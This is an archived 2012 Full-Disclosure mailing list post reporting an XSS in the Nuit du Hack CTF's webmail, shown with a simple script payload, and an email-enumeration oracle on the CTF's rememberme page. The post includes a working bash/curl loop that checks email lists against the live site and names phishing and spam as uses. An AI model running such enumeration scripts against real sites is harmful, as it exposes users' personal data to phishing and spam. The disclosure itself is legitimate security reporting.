lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sat, 24 Mar 2012 05:54:10 +0100
From: klondike <klondike@...cosoft.es>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Oracle based personal data dumping attack on
 the nuit du hack CTF

El 24/03/12 05:27, klondike escribió:
> So I was bored with the nuit du hack prequals and decided to test a
> bit the e-mail service.
>
> The guys have a cool XSS injection on the fake webmail service which
> can be exploited with a properly crafted subject (i.e.
> <script>alert('Hello!');</script> ). I thought the guys behind nuit du
> hack were a bit more serious than this...
>
> klondike
>
BTW and on completely unrelated note there is an attack which could
allow an attacker to guess the addresses of the participants as long as
they are on a database owned by him. This attack works by consulting the
page as if it were a yes/no oracle and using the results to know wether
an address is on the page database or not.

Usages of the attack? Well, trying to guess participants passwords,
phising attacks, spamming ... Pick your choice xD

And as with any good full disclosure here you go a nice script to
exploit it:
while read email; do curl -s -o-
http://prequals.nuitduhack.com/rememberme.php -d "mail=$email" | fgrep
'<div class="error">This mail doesn'\''t correspond to any
account</div>' > /dev/null && echo Failure || echo "$email"; done

Well don't be bad with it, participants have no fault of this,

klondike

PS: What I wonder now is, are the guys behind the CTF reading
Full-disclosure?


Content of type "text/html" skipped

Download attachment "signature.asc" of type "application/pgp-signature" (263 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ